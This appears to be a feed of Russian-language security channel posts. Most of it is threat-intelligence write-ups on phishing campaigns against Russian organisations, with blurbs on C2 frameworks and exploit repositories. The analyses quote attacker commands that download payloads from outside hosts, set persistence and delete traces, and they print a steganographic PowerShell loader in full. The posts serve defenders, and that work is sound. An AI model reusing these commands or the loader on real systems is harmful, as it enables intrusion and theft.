Fsecurity | HH

Cavalry Werewolf: целевая атака на госсектор РФ ⚙️ Формат атаки 🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS). После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe. Через него операторы докачивают новые модули через LOLBAS: bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php. Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа. 🧠 Цели и действия атакующего Атакующие проводят ручную разведку через cmd.exe: whoami ipconfig /all net user dir C:\Users\<user>\Downloads dir C:\Users\Public\Pictures Проверяют сетевые прокси: [System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com") Загружают новые модули через PowerShell и curl: powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe" curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe Закрепление через Run-ключ: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe. 🧩 Инструменты Cavalry Werewolf BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот). BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang), revv2.exe -connect IP:10443. Trojan.Inject5.57968 — инжект в aspnet_compiler.exe, шифрование RC2 / AES, C2. Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой. Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT. Trojan.Clipper.808 — крадет криптокошельки, копирует себя в %APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах. ⛓️‍💥Типовая цепочка действий 1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл). 2️⃣ Разведка: whoami / ipconfig / net user. 3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl. 4️⃣ Закрепление через Run-ключ или планировщик. 5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe. 6️⃣ Создание туннелей и Telegram-C2. 7️⃣ Эксфильтрация документов, удаление следов. 🧠 Тактические наблюдения Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc). Telegram-C2 как универсальный контроль вместо доменов. Мимикрия под госдокументы и троянизированные программы. Активная LOLBAS-цепочка: bitsadmin → powershell → cmd.exe. Хранение и запуск из C:\Users\Public\Pictures|Libraries|Downloads. Переход от разведки к туннелям и долговременному C2 в одном цикле. 🔍 Что отслеживать • Исполнение EXE из Public-директорий. • Bitsadmin с /transfer и URL-адресами. • PowerShell Invoke-WebRequest → Public-папки. • Инжект в aspnet_compiler.exe. • Run-ключи с путём на C:\Users\Public\. • Трафик к api.telegram.org или подозрительным IP 🔗https://news.drweb.ru/show/?i=15078 🦔 THF

🔗Ссылка: https://github.com/IBM/portieris

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/blog/personal/xiaomite-journal/356648.php

🔗Ссылка: https://www.securitylab.ru/news/565844.php

🔗Ссылка: https://opennet.ru/64197/

Определенно стоит почитать https://www.synacktiv.com/en/publications/site-unseen-enumerating-and-attacking-active-directory-sites

Sites did not receive much attention by the Active Directory offensive research community, comparatively to other ACL-based attack vectors. This article aims to demonstrate that not only do attack vectors targeting Active Directory sites exist, but that they can lead to impactful privilege escalation scenarios and to domain(s) compromise.

#ad #pentest #redteam #bloodhound

🔗Ссылка: https://github.com/salesforce/jarm

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

😈 Venom C2 A dependency‑free Python3 Command & Control framework for redteam persistence, built to run on systems without installing packages. It comprises a Flask team server, an Electron operator GUI, and a single‑file Python agent that communicates over HTTP/HTTPS using configurable AES‑encrypted JSON messages. Use it to execute commands, manage files, maintain access, and create SSH reverse tunnels from compromised systems.

☹️ #web3 #offense #заметки ➡️Что НЕ стоит делать: анти-паттерны разработки смарт-контрактов на Solidity, уязвимые лаборатории и эксплойты для изучения атак на конкретных примерах – всё это в репозиториях ниже:    🧩 kadenzipfel/smart-contract-vulnerabilities ➡️38 типов уязвимостей, но без контрактов☹️    🧩   SunWeb3Sec/DeFiVulnLabs ➡️От компании XREX; ➡️48 типов уязвимостей;    🧩   sigp/solidity-security-blog ➡️От компании Sigma Prime; ➡️18 типов уязвимостей с подробнейшим описанием; ➕Составляет часть книги Mastering Ethereum;    🧩   crytic/not-so-smart-contracts ➡️От компании Trail of Bits; ➡️11 типов уязвимостей; ➕Анализ honeypot'ов: ./honeypots; ➕Дальше переехали в crytic/building-secure-contracts; ⬜️➖⬜️➖⬜️➖    🧩   coinspect/learn-evm-attacks ➡️От компании Coinspect; ➡️40 эксплойтов из реальных кейсов‼️

Включают в себя случаи, затронувшие настоящие проекты в период с 2021 года по текущий; Разбиты по типу проэксплуатированных недостатков: ▪️Access Control [6] ▪️Bad Data Validation [4] ▪️Business Logic [17] ▪️Reentrancy [8] ▪️Bridges [5] Самые интересные кейсы: ▪️Tornado Cash Governance Takeover (2023) – тут про DELEGATECALL и governance; ▪️Furucombo (2021) – тут тоже про DELEGATECALL; ▪️MBC Token (2022) – тут про токеномику и sandwich атаки; ▪️Uranium (2021) – тут про AMM и формулу x*y=k.

   @HaHacking  🐇

🔗Ссылка: https://codeby.net/threads/hackerlab-dlya-chainikov-kak-pol-zovat-sya-platformoi-zadach-codeby-i-reshat-pervyye-chellendzhi.91118/

🔗Ссылка: https://habr.com/ru/articles/955088/

🔗Ссылка: https://habr.com/ru/companies/first/articles/903572/

🔗Ссылка: https://xakep.ru/2025/11/06/akira-openoffice/

Одинокий волк тебе не товарищ 🐺 Группа киберразведки зафиксировала очередную фишинговую кампанию группировки Lone Wolf: злоумышленники используют стеганографию для скрытой доставки загрузчика вредоносного ПО. Жертве отправляют архив (скриншот 1) с двумя файлами: размытым изображением «досудебное.png» (скриншот 2) и ярлыком «сверка.lnk». Открытие ярлыка приводит к запуску PowerShell с параметрами скрытого окна и обходом политики выполнения.

-WindowStyle Hidden -ExecutionPolicy Bypass -Command 
"$data=[IO.File]::ReadAllBytes('досудебное.png');
$key=$data[144];
$file=$env:TEMP+'\yVLQbWaX.exe';
$i=[Text.Encoding]::ASCII.GetString($data).LastIndexOf('IDAT')+4;
$xdata = ($data[$i..$data.Length] | ForEach-Object { $_ -bxor $key }); [IO.File]::WriteAllBytes($file, $xdata); 
Start-Process -FilePath $file -WindowStyle Hidden"

👨‍🎨 При запуске скрипт читает байты изображения, берет ключ из 145-го байта и находит в ASCII-представлении последний маркер PNG-чанка IDAT. Затем берет все, что идет за ним, декодирует с помощью XOR и сохраняет результат во временном каталоге как %TEMP%\yVLQbWaX.exe, после чего запускает его. Таким образом, изображение выступает контейнером для полезной нагрузки с параметрами скрытого окна и обходом политики выполнения. Примененная техника извлечения из сегмента IDAT концептуально повторяет подход, ранее замеченный в семействе загрузчиков IDAT Loader (HijackLoader), что указывает на переиспользование или заимствование решений из существующего вредоносного ПО. Запущенный yVLQbWaX.exe обращается по адресу ezstat.ru/flowersforlove.gif. Указанный домен при обращении перенаправляет на контролируемый злоумышленниками ресурс valisi.ru, на котором фактически размещен вредоносный HTA-файл. Его выполняет системная утилита mshta.exe. Внутри HTA-файла содержится код на VBScript, который вновь запускает PowerShell для распаковки Base64-строки как файла gzip в памяти и для дальнейшего запуска результата. Анализ показал, что итоговый шеллкод соответствует Beacon — полезной нагрузке Cobalt Strike. Финальный этап реализует «бесфайловое» выполнение в оперативной памяти через рефлективную загрузку. 🎭 Вся цепочка демонстрирует последовательную многоступенчатую маскировку: • стеганография в PNG (T1027.003) + обфускация или кодирование (T1027, T1140); • пользовательское выполнение LNK-файла (T1204.002) в рамках фишинга с вложением (T1566.001); • загрузка удаленного компонента (HTA-файла) по сети (T1105); • выполнение HTA-файла через прокси-сервер с помощью mshta.exe (T1218.005); • использование скриптовых интерпретаторов (VBScript, PowerShell) в качестве средств развертывания (T1059.005, T1059.001); • рефлективная загрузка и выполнение полезных нагрузок в памяти (T1620). 💡 Сетевая инфраструктура, с которой взаимодействует вредоносное ПО, не менялась с марта текущего года. IoCs Домены

valisi.ru
ecols.ru

IP-адреса

91.218.228.26
188.120.232.76

Хеш-суммы

ec2924d70d86d24e911202b1523c1858
ae7996444c3d9dbc66c6768993a032c3ca39cc59
6b139dec14e03afdaa6ac51415a9d097eaddb9b7ebba5f77575404c5395ff778

bc957c0d268732c83c4b1a33a37a5854
7c5e95a312567541c9839b9aeefdb66f8b92ffe8
ae8c52e498f5c9a328cf9a2b18b5caf11b677108c4da6ac556a66ccb99faba17

38bcebee4a5c0a18a4794ad7c882e536
af2c5c5113389b16351577837087d2a5f618edca
dcee83c2859df268528002c8b5cdfb2d7821985b36e5b5fab8eb9de4cbc812e1

aed3b15ef7c731cdc8e84c0de42adcdc
bc3a04ccdd5e7de167d2f4d3e75239087075e03c
2d91100a95a2d26c8bcf42dea5aeddb3bfad84b1827bc1b7670a9eac8a0936b8

Дополнительные индикаторы

gemme-cotti.ru
seko-group.ru
run-xin.ru
mzmz.ru
igran.ru
dewatering.ru
clwater.ru
ivaco.su
hydrochem.ru
гидрохим.рф

#TI #APT #Phishing @ptescalator

🔗Ссылка: https://opennet.ru/64194/

🔗 Ссылка: https://www.securitylab.ru/news/565708.php

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Conquest A feature-rich and malleable command & control/post-exploitation framework developed in Nim. Blog: https://jakobfriedl.github.io/blog/nim-c2-traffic/